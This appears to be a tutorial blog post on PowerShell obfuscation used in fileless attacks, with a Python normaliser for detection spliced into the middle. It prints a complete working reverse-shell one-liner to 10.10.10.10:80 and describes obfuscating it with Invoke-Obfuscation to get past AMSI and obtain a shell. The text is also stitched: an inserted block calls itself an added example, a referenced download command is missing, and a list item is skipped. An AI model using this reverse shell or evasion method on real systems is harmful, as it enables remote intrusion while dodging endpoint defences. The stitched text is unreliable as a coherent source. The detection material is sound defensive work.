Fileless attacks are becoming a popular technique used by adversaries in cyber attacks. Attackers often use PowerShell to run fileless malware: non-binary payloads that anti-virus solutions cannot easily detect. Adversaries rely on obfuscation techniques to hide their malicious payload and to avoid detection of their attack. Today we will learn how and why attackers use PowerShell.
What is PowerShell?
PowerShell was initially created by Microsoft as a powerful task-based command-line shell and scripting language built on .NET. Windows PowerShell is a popular tool for performing admin tasks and, like any useful tool, can be leveraged by adversaries. PowerShell can easily import modules, access core Windows APIs, execute remote commands, use the Start-Process cmdlet to run an executable, and use Invoke-Command, which runs a command locally or on a remote computer. This makes PowerShell a lethal weapon in the hands of malware writers. PowerShell provides easy access to all major functions of the operating system. The versatility of PowerShell makes it an ideal candidate for any purpose, whether the user is a defender or an attacker.
Reasons why attackers use PowerShell
1. PowerShell is installed by default on all new Windows computers.
2. PowerShell has remote access capabilities by default, with encrypted traffic.
3. As a script, it is easy to obfuscate.
4. Its malicious use is often not stopped or detected by traditional endpoint defenses, as files and commands are not written to disk. This means fewer artifacts to recover for forensic analysis.
PowerShell Obfuscation
Obfuscation means to make something difficult to understand. Programming code is often obfuscated to protect intellectual property or trade secrets and to prevent an attacker from reverse engineering a proprietary software program. Malicious code writers also use obfuscation techniques to prevent their attack mechanisms from being detected by antimalware tools.
What are the most common PowerShell obfuscation techniques?
In order to understand PowerShell obfuscation techniques, we will check the following example:
The above command will download an expression from the given URL and execute it.
Basic PowerShell obfuscation techniques:
1. Split strings into multiple parts which are concatenated through the "+" operator, for example.
2. Backticks are used for escaping characters in PowerShell and for wrapping lines of code. They are commonly used in obfuscation to escape non-special characters and break up words to prevent matching.
4. Spaces can be used to obfuscate: extra whitespace confuses the reader without changing how PowerShell interprets the code.
5. Upper and lower case: using random uppercase or lowercase letters in the script.
6. Encoding: encoding techniques can be used to obfuscate PowerShell commands. For this example, I used hex encoding.
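The techniques above defeat plain string matching, so a defender normalises the script before matching. The following Python normaliser is an added example, not code from the original post or from Invoke-Obfuscation: it drops backticks placed before non-escape characters (assuming the Windows PowerShell 5.1 escape letters; `e and `u arrived in PowerShell 6), folds "+"-concatenated strings and [char] hex/decimal runs, collapses spacing and case, then checks for the download-cradle and socket tokens this post discusses. The sample script line and the indicator list are constructed for the example.

```python
import re

# Indicators checked after normalisation. Constructed for this example from
# the behaviours discussed in the post (download cradle, socket reverse shell).
INDICATORS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "tcpclient", "getstream")

_STR = r"""(?:"[^"]*"|'[^']*')"""                       # one quoted literal
_CONCAT = re.compile(rf"({_STR})\s*\+\s*({_STR})")      # "a" + "b"
_PAREN_STR = re.compile(rf"\(\s*({_STR})\s*\)")         # ("ab") -> "ab"
# [char]0x69+[char]0x65+... runs (hex or decimal, any case)
_CHAR_RUN = re.compile(
    r"\[char\]\s*(?:0x[0-9a-f]+|\d+)(?:\s*\+\s*\[char\]\s*(?:0x[0-9a-f]+|\d+))*", re.I)
# Backtick before anything other than a real escape letter (Windows PowerShell
# 5.1: 0 a b f n r t v) or a quote/backtick/$ is a no-op the tokenizer discards.
_NOOP_BACKTICK = re.compile(r"`(?![0abfnrtv`'$\"])(.)")


def _chars_to_string(m):
    """Turn a [char]N+[char]M run into the string literal it builds."""
    codes = re.findall(r"0x[0-9a-f]+|\d+", m.group(0), re.I)
    text = "".join(chr(int(c, 16) if c.lower().startswith("0x") else int(c))
                   for c in codes)
    return '"' + text + '"'


def normalize(script: str) -> str:
    """Undo the cosmetic obfuscation layers so substring matching works again."""
    s = re.sub(r"`\r?\n\s*", " ", script)      # backtick line continuations
    s = _NOOP_BACKTICK.sub(r"\1", s)           # I`E`X -> IEX
    s = _CHAR_RUN.sub(_chars_to_string, s)     # [char] runs -> "literal"
    prev = None
    while prev != s:                           # repeat until nothing folds
        prev = s
        s = _CONCAT.sub(lambda m: '"' + m.group(1)[1:-1] + m.group(2)[1:-1] + '"', s)
        s = _PAREN_STR.sub(r"\1", s)
    return re.sub(r"\s+", " ", s).strip().lower()   # spacing and random case


def find_indicators(script: str) -> list:
    """Return the indicators present once the script is normalised."""
    norm = normalize(script)
    return [i for i in INDICATORS if i in norm]


# Constructed sample: backticks, random case, split strings and extra spaces.
SAMPLE = """  I`E`X ( nEw-oBjEcT ("Ne"+"t.WebC"+'lient') ).("Down"+"load"+"String")($u)"""

if __name__ == "__main__":
    print(normalize(SAMPLE))
    print(find_indicators(SAMPLE))
```

Running the sample yields the indicators iex, downloadstring and net.webclient, none of which match in the raw line.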
Applying all of these obfuscation techniques manually is hard, so how can we do it automatically? For that purpose, we can use a tool called "Invoke-Obfuscation". Invoke-Obfuscation is an open-source obfuscation framework written in PowerShell that obfuscates PowerShell commands and scripts.
In order to understand how to obfuscate PowerShell one-liner exploits with the Invoke-Obfuscation tool, we will check the following example.
```powershell
# One-liner reverse shell used in the post (10.10.10.10:80 is the listener address in the example)
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
It is just a basic one-liner reverse shell command.
As you can see, when I run this command, Windows Antimalware Scan Interface (AMSI) blocks this action because this command contains malicious commands.
Then I obfuscate this command using the Invoke-Obfuscation tool. When I run the obfuscated command, Windows Antimalware Scan Interface (AMSI) does not block my command and, boom, I have a shell.
References
https://www.danielbohannon.com/blog-1/2016/10/1/invoke-obfuscation-v11-release-sunday-oct-9
https://github.com/danielbohannon/Invoke-Obfuscation